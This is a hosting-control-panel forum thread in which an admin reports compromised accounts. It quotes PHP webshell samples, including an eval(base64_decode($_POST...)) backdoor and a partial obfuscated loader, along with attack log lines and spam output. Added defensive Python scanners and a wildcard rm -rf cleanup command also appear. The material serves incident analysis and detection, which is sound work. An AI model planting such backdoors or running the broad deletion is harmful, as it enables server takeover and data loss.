MRatWork Forum by Mustafa Ramadhan
Sawo Project - Kloxo-MR Discussions => Kloxo-MR Bugs and Requests => Topic started by: Spacedust on 2014-11-07, 17:15:38
-
We've got some customers whose accounts have been hacked (not via FTP, but via the web, using many different scripts).
There are additional files like files.php or options.php with content like:
<?php eval(base64_decode($_POST['n6ae4d5']));?>
or
<?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = $r76[27].$r76[49].$r76[58].$r76[66].$r76[87].$r76[90].$r76[58].$r76[87]; $GLOBALS['nhnww15'] = $r76[58].$r76[41].$r76[45].$r76[7].$r76[53].$r76[23].$r76[76]; $GLOBALS['igajs32'] = $r76[41].$r76[49].$r76[87].$r76[27].$r76[27].$r76[76].$r76[76]; $GLOBALS['cpukq94'] = $r76[49].$r76[78].$r76[90].$r76[45].$r76[7].$r76[18].$r76[14]; $GLOBALS['bdonk12'] = $r76[36].$r76[43].$r76[61].$r76[96].$r76[49].$r76[18].$r76[18]; $GLOBALS['aurku4'] = $r76[53].$r76[49].$r76[20].$r76[61].$r76[49].$r76[46].$r76[15]; $GLOBALS['yqqkt30'] = $r76[7].$r76[45].$r76[58].$r76[27].$r76[87].$r76[53].$r76[49].$r76[58].$r76[54].$r76[94].$r76[20].$r76[53].$r76[66].$r76[87].$r76[66]; $GLOBALS['tnmsd36'] = $r76[78].$r76[90].$r76[53].$r76[5]; $GLOBALS['chqql44'] = $r76[90].$r76[24].$r76[78].$r76[87].$r76[20].$r76[31].$r76[46]; $GLOBALS['cvtxr40'] = $r76[94].$r76[27].$r76[69].$r76[43].$r76[66].$r76[31].$r76[52]; $GLOBALS['eavur97'] = $r76[45].$r76[66].$r76[5].$r76[94].$r76[94].$r76[41]; $GLOBALS['ptlaz26'] = $r76[45].$r76[24].$r76[70].$r76[7].$r76[45].$r76[14].$r76[18]; $GLOBALS['xcnkh30'] = $r76[20].$r76[5].$r76[5].$r76[94].$r76[35].$r76[52]; $GLOBALS['wnlxd28'] = $r76[87].$r76[24].$r76[53].$r76[78]; 
$GLOBALS['laepm94'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['nxseo15'] = $r76[61].$r76[94].$r76[87].$r76[36].$r76[49].$r76[66].$r76[87].$r76[96].$r76[69].$r76[58].$r76[90].$r76[78].$r76[94]; $GLOBALS['cyzbs96'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36]; $GLOBALS['yoejz48'] = $r76[24].$r76[35].$r76[94].$r76[29].$r76[61].$r76[31].$r76[15]; $GLOBALS['lzjpr73'] = $r76[43].$r76[95].$r76[87].$r76[47].$r76[7].$r76[23].$r76[18]; $GLOBALS['osnjl91'] = $r76[24].$r76[20].$r76[24].$r76[78].$r76[41].$r76[14].$r76[52]; $GLOBALS['zhjzv93'] = $r76[41].$r76[24].$r76[27].$r76[45].$r76[20].$r76[85].$r76[14]; $GLOBALS['brkww19'] = $r76[66].$r76[87].$r76[24].$r76[5].$r76[94].$r76[58]; $GLOBALS['yhcum29'] = $r76[49].$r76[69].$r76[69].$r76[66].$r76[61].$r76[18].$r76[52]; $GLOBALS['ibere91'] = $r76[7].$r76[49].$r76[7].$r76[87].$r76[61].$r76[46].$r76[14]; $GLOBALS['vszxc90'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[29].$r76[94].$r76[69].$r76[66]; $GLOBALS['qtgcq90'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[5].$r76[94].$r76[27].$r76[87]; $GLOBALS['bwpvf88'] = $r76[45].$r76[27].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]; $GLOBALS['bdvxl14'] = $r76[66].$r76[87].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['xizmx47'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[61].$r76[94].$r76[87]; $GLOBALS['stkuy98'] = $r76[70].$r76[29].$r76[90].$r76[84].$r76[84].$r76[15].$r76[18]; $GLOBALS['duiid33'] = $r76[95].$r76[90].$r76[87].$r76[94]; $GLOBALS['grxdw62'] = $r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24]; $GLOBALS['nvuxa92'] = $r76[69].$r76[96].$r76[94].$r76[43].$r76[69].$r76[18].$r76[18]; $GLOBALS['ysmvf63'] = $r76[78].$r76[53].$r76[58]; $GLOBALS['vbhwy58'] = ${$r76[54].$r76[3].$r76[17].$r76[55].$r76[67]}; $GLOBALS['wdbfr89'] = 
$r76[7].$r76[94].$r76[43].$r76[7].$r76[20].$r76[85].$r76[52]; $GLOBALS['vxogc32'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[66].$r76[41].$r76[5].$r76[53].$r76[87]; $GLOBALS['inenw32'] = $r76[20].$r76[43].$r76[66].$r76[94].$r76[66].$r76[46].$r76[85]; $GLOBALS['xyxdn38'] = $r76[27].$r76[36].$r76[24]; $GLOBALS['rtdlc97'] = $r76[49].$r76[24].$r76[95]; $GLOBALS['cnrfe78'] = $r76[45].$r76[24].$r76[5].$r76[95].$r76[94].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['wzekj92'] = $r76[66].$r76[87].$r76[24].$r76[53].$r76[41].$r76[66].$r76[5].$r76[90].$r76[66].$r76[36].$r76[94].$r76[66]; $GLOBALS['yrqxp89'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[7].$r76[5].$r76[53].$r76[41]; $GLOBALS['xavtv19'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36].$r76[54].$r76[90].$r76[5].$r76[5]; $GLOBALS['zjheh80'] = $r76[96].$r76[90].$r76[66].$r76[94].$r76[23].$r76[85].$r76[54].$r76[94].$r76[58].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['gisxn89'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]; $GLOBALS['oqikt29'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[5].$r76[90].$r76[66].$r76[87].$r76[54].$r76[94].$r76[24].$r76[24].$
Then these files are executed remotely from different IPs:
37.139.47.122 - - [03/Nov/2014:05:15:09 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10804 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
85.143.166.99 - - [03/Nov/2014:08:32:48 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10828 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
37.139.47.122 - - [03/Nov/2014:11:56:25 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10960 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
62.76.178.9 - - [03/Nov/2014:17:00:18 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 12317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
Then our mail queue is full of messages like this (we use a limit of 100 per hour, but it's annoying as hell, as our mail server's IP is added to DNS blocklists):
--------------
MESSAGE NUMBER 793825
--------------
Received: (qmail 3373 invoked by uid 2513); 7 Nov 2014 11:08:54 -0000
Date: 7 Nov 2014 11:08:54 -0000
Message-ID: <20141107110854.3372.qmail@mail.xxx.pl>
To: rvkadam1980@gimail.com
Subject: Fw: LOL =) [ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org
From: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
Reply-To: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
<h2><a href="http://BIOSTRUCTURES.NET/wp-content/plugins/categories-images/defines.html?cHRpY2ZjbzM7OjJCZWtvY2tuLGFtbw==">[ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org</a></h2>
<div>the polar cap. How do you know that the artifact was taken that way?"</div>
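Two defender-side checks for the file samples in this post, as an added example written for this page (not code from the thread, from Kloxo-MR or from OpenX): a scanner for the eval(base64_decode($_POST[...])) one-liner, and a resolver that rebuilds the function names that the second style assembles from single characters of one key string ($r76[94].$r76[24]...). The key `$k` and the names `f1`/`f2` in the INDEXED sample are constructed for the demonstration; the real `$r76` key is not decoded here.

```python
"""Static triage for the two PHP webshell styles quoted in the thread (added example)."""
import os
import re

# Pattern 1: eval() over a decoded request parameter, e.g. eval(base64_decode($_POST['x'])).
EVAL_DECODE_RE = re.compile(
    r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(\s*"
    r"\$_(?:POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)

# Pattern 2: a key string ($r76 = "...") whose single characters are concatenated
# ($r76[94].$r76[24]...) into function names stored in $GLOBALS.
KEY_DEF_RE = re.compile(r"\$(\w+)\s*=\s*(\"(?:\\.|[^\"\\])*\"|'(?:\\.|[^'\\])*')\s*;")
CHAIN_RE = re.compile(r"\$GLOBALS\['(\w+)'\]\s*=\s*((?:\$\w+\[\d+\]\s*\.\s*)*\$\w+\[\d+\])\s*;")
PIECE_RE = re.compile(r"\$(\w+)\[(\d+)\]")

# Names whose appearance as an obfuscated string is worth a look.
DANGEROUS = {"eval", "assert", "base64_decode", "gzinflate", "str_rot13", "system",
             "exec", "shell_exec", "passthru", "popen", "proc_open", "create_function"}

PHP_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f", "e": "\x1b",
               "\\": "\\", '"': '"', "$": "$"}


def php_unescape(literal):
    """Turn a PHP string literal (quotes included) into its runtime value.

    Only the escapes PHP processes are handled; any other backslash is kept,
    as PHP does. Indexing assumes one byte per character, which holds for the
    ASCII keys this family uses.
    """
    quote, body = literal[0], literal[1:-1]
    if quote == "'":
        return body.replace("\\'", "'").replace("\\\\", "\\")
    out, i = [], 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body):
            nxt = body[i + 1]
            if nxt in PHP_ESCAPES:
                out.append(PHP_ESCAPES[nxt])
                i += 2
                continue
            hexm = re.match(r"x([0-9A-Fa-f]{1,2})", body[i + 1:i + 4])
            if hexm:
                out.append(chr(int(hexm.group(1), 16)))
                i += 1 + len(hexm.group(0))
                continue
        out.append(ch)
        i += 1
    return "".join(out)


def resolve_index_chains(source):
    """Rebuild every $GLOBALS['name'] = $key[i].$key[j]... assignment into plain text."""
    keys = {name: php_unescape(lit) for name, lit in KEY_DEF_RE.findall(source)}
    resolved = {}
    for target, chain in CHAIN_RE.findall(source):
        chars = []
        for var, idx in PIECE_RE.findall(chain):
            key = keys.get(var)
            if key is None or int(idx) >= len(key):
                chars = None  # refers to a key we did not see (e.g. a truncated sample)
                break
            chars.append(key[int(idx)])
        if chars is not None:
            resolved[target] = "".join(chars)
    return resolved


def scan_php(source):
    """Return a list of human-readable findings for one PHP file's contents."""
    findings = []
    if EVAL_DECODE_RE.search(source):
        findings.append("eval over decoded request parameter")
    hidden = {v for v in resolve_index_chains(source).values() if v.lower() in DANGEROUS}
    if hidden:
        findings.append("index-obfuscated call names: " + ", ".join(sorted(hidden)))
    return findings


def scan_tree(root):
    """Walk a document root and yield (path, findings) for every flagged .php file."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_php(fh.read())
                if findings:
                    yield path, findings


# Constructed samples: ONE_LINER mirrors the one-liner quoted in the thread; INDEXED uses
# a short made-up key in the same style as the $r76 sample (it is not the real key).
ONE_LINER = "<?php eval(base64_decode($_POST['n6ae4d5']));?>"
INDEXED = r'''<?php $k="abcdefghijklmnopqrstuvwxyz_46"; $GLOBALS['f1'] = $k[1].$k[0].$k[18].$k[4].$k[28].$k[27].$k[26].$k[3].$k[4].$k[2].$k[14].$k[3].$k[4]; $GLOBALS['f2'] = $k[4].$k[21].$k[0].$k[11]; ?>'''

if __name__ == "__main__":
    for label, src in (("one-liner", ONE_LINER), ("indexed", INDEXED)):
        print(label, scan_php(src), resolve_index_chains(src))
```

Run `scan_tree("/home/<user>/<domain.com>")` over each account's document root to list flagged files; the resolver only reports names it could rebuild completely, so a sample cut off mid-statement (as the quoted one is) yields a partial but still useful list.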
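The access-log and directory-listing clues in this post can also be triaged mechanically. As an added example (written for this page, not from the thread or from Kloxo-MR), the block below groups POST requests by PHP script and flags scripts that are hit from several source IPs without ever carrying a Referer, and separately flags files in a directory whose modification time is far newer than their siblings (the info.php from Sep 18 among Dec 2012 OpenX files). Log lines, timestamps and the listing are constructed, with documentation-range IPs, modelled on the lines quoted above.

```python
"""Triage of a combined-format access log and a directory listing for dropped-file signals (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined log format, as in the lines quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def find_suspect_scripts(lines, min_ips=2):
    """Flag PHP scripts whose POSTs never carry a Referer and come from several IPs.

    A browser submitting a form sends a Referer; a tool driving a dropped shell
    usually does not. Several distinct source IPs hitting one obscure script is
    the other half of the signal. Returns {script: {"hits", "ips", "user_agents"}}.
    """
    seen = defaultdict(lambda: {"hits": 0, "no_referer": 0, "ips": set(), "uas": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        script = m["path"].split("?", 1)[0]
        if not script.lower().endswith(".php"):
            continue
        rec = seen[script]
        rec["hits"] += 1
        rec["ips"].add(m["ip"])
        rec["uas"].add(m["ua"])
        if m["referer"] in ("", "-"):
            rec["no_referer"] += 1
    return {
        script: {"hits": r["hits"], "ips": sorted(r["ips"]), "user_agents": sorted(r["uas"])}
        for script, r in seen.items()
        if r["no_referer"] == r["hits"] and len(r["ips"]) >= min_ips
    }


def newer_than_siblings(entries, min_gap_days=30):
    """Given [(name, mtime)] for one directory, return names at least min_gap_days
    newer than the oldest entry: a file dropped among application files that were
    all installed together."""
    if not entries:
        return []
    oldest = min(t for _, t in entries)
    return sorted(n for n, t in entries if t - oldest >= timedelta(days=min_gap_days))


# Constructed log: four POSTs to the thread's script from three IPs with no Referer and one
# shared User-Agent, plus ordinary traffic that must not be flagged.
CONSTRUCTED_LOG = """\
192.0.2.10 - - [03/Nov/2014:05:15:09 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10804 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
198.51.100.7 - - [03/Nov/2014:08:32:48 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10828 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
203.0.113.77 - - [03/Nov/2014:09:10:11 +0100] "GET /reklamy/www/delivery/ajs.php?zoneid=3 HTTP/1.1" 200 2110 "http://www.example.pl/" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/33.0"
192.0.2.10 - - [03/Nov/2014:11:56:25 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10960 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
198.51.100.20 - - [03/Nov/2014:12:00:00 +0100] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.pl/contact.php" "Mozilla/5.0 (Windows NT 6.3) Gecko/20100101 Firefox/33.0"
198.51.100.21 - - [03/Nov/2014:12:05:00 +0100] "POST /contact.php HTTP/1.1" 302 0 "-" "curl/7.38.0"
203.0.113.5 - - [03/Nov/2014:17:00:18 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 12317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
"""

# Constructed listing in the shape of the ls -l output quoted later in the thread.
LISTING = [
    ("AdServer", datetime(2012, 12, 3)),
    ("AdServer.php", datetime(2012, 12, 3)),
    ("Channel", datetime(2012, 12, 3)),
    ("info.php", datetime(2014, 9, 18)),
]

if __name__ == "__main__":
    for script, info in find_suspect_scripts(CONSTRUCTED_LOG.splitlines()).items():
        print(script, info)
    print("newer than siblings:", newer_than_siblings(LISTING))
```

Feed the real access_log through `find_suspect_scripts(open(path))` and check each flagged script's directory with `newer_than_siblings`; a script that trips both checks is the first thing to pull for review.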
-
Please post here the directory of file.php.
This issue also happens in cPanel accounts.
-
Please post here the directory of file.php.
This issue also happens in cPanel accounts.
Here you are:
ls -l /home/httpd/plotki.klik.net.pl/httpdocs/reklamy/lib/max/Maintenance/Forecasting/
total 20K
drwxr-xr-x 3 piotr_k2_2004 piotr_k2_2004 4.0K Dec 3 2012 AdServer
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004 4.3K Dec 3 2012 AdServer.php
drwxr-xr-x 2 piotr_k2_2004 piotr_k2_2004 4.0K Dec 3 2012 Channel
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004 301 Sep 18 16:31 info.php
-
/home/httpd/<domain.com>/httpdocs is just a symlink to /home/<user>/<domain.com>/
This symlink has existed since official Kloxo. I didn't know whether it is important or not.
-
Fortunately, Kloxo-MR does not create this /home/httpd/<domain.com>/httpdocs. It appears if the domain was created in official Kloxo and still exists after updating to Kloxo-MR.
Remove these old directories with:
rm -rf /home/httpd/*/httpdocs
rm -rf /home/httpd/*/conf
-
It does not matter. The problem is how the hackers are able to inject the code via the web when permissions are fine and FTP wasn't hacked.
-
A plugin in WordPress.
-
Read http://cachecrew.com/fixing-an-infected-php-web-server/
-
@Spacedust, have you found the method used to inject these files? Were all affected accounts using WordPress?
Please post your findings here. Thank you.
-
@Spacedust, have you found the method used to inject these files? Were all affected accounts using WordPress?
Please post your findings here. Thank you.
No, they were not using WordPress, but they were using OpenX.
-
This is how they upload files!
-
That is a backdoor called with a c99 shell. I think enabling PHP safe mode would make it more secure.